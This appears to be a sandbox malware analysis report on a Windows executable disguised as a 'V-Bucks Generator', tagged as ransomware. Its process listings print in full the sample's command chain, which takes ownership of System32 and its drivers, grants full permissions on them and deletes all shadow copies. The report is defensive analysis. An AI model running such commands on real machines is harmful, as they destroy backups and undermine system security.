Malware Analysis Report

2024-11-16 12:53

Sample ID 240814-pbmpbswcrj
Target V-Bucks Generator.exe
SHA256 9bf2689546105532a778dc6a0a6e964ece8ff33c4fcea28e82c29940e06d2666
Tags
defense_evasion discovery execution exploit impact ransomware
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

9bf2689546105532a778dc6a0a6e964ece8ff33c4fcea28e82c29940e06d2666

Threat Level: Likely malicious

The file V-Bucks Generator.exe was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery execution exploit impact ransomware

Deletes shadow copies

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Enumerates physical storage devices

Unsigned PE

Interacts with shadow copies

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-14 12:09

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-14 12:09

Reported

2024-08-14 12:09

Platform

win7-20240704-en

Max time kernel

15s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2972 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe C:\Windows\System32\cmd.exe
PID 2972 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe C:\Windows\System32\cmd.exe
PID 2972 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe C:\Windows\System32\cmd.exe
PID 2684 wrote to memory of 2844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2684 wrote to memory of 2844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2684 wrote to memory of 2844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2684 wrote to memory of 2800 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2684 wrote to memory of 2800 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2684 wrote to memory of 2800 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2684 wrote to memory of 2852 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2684 wrote to memory of 2852 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2684 wrote to memory of 2852 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2684 wrote to memory of 2820 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2684 wrote to memory of 2820 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2684 wrote to memory of 2820 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2684 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2684 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2684 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe

"C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c color 47 && title Critical process && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && vssadmin delete shadows /all /quiet && Exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant Admin:F

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers /grant Admin:F

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

N/A

Files

memory/2972-0-0x000007FEF62D3000-0x000007FEF62D4000-memory.dmp

memory/2972-1-0x0000000000A30000-0x0000000000AA8000-memory.dmp

memory/2972-2-0x0000000000990000-0x0000000000A0A000-memory.dmp

memory/2972-3-0x000007FEF62D0000-0x000007FEF6CBC000-memory.dmp

memory/2972-4-0x000007FEF62D0000-0x000007FEF6CBC000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-14 12:09

Reported

2024-08-14 12:09

Platform

win10v2004-20240802-en

Max time kernel

21s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe

"C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c color 47 && title Critical process && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && vssadmin delete shadows /all /quiet && Exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant Admin:F

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers /grant Admin:F

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp

Files

memory/4536-0-0x0000026AE5680000-0x0000026AE56F8000-memory.dmp

memory/4536-1-0x00007FFD38023000-0x00007FFD38025000-memory.dmp

memory/4536-2-0x0000026AFFB80000-0x0000026AFFBFA000-memory.dmp

memory/4536-3-0x00007FFD38020000-0x00007FFD38AE1000-memory.dmp

memory/4536-5-0x00007FFD38020000-0x00007FFD38AE1000-memory.dmp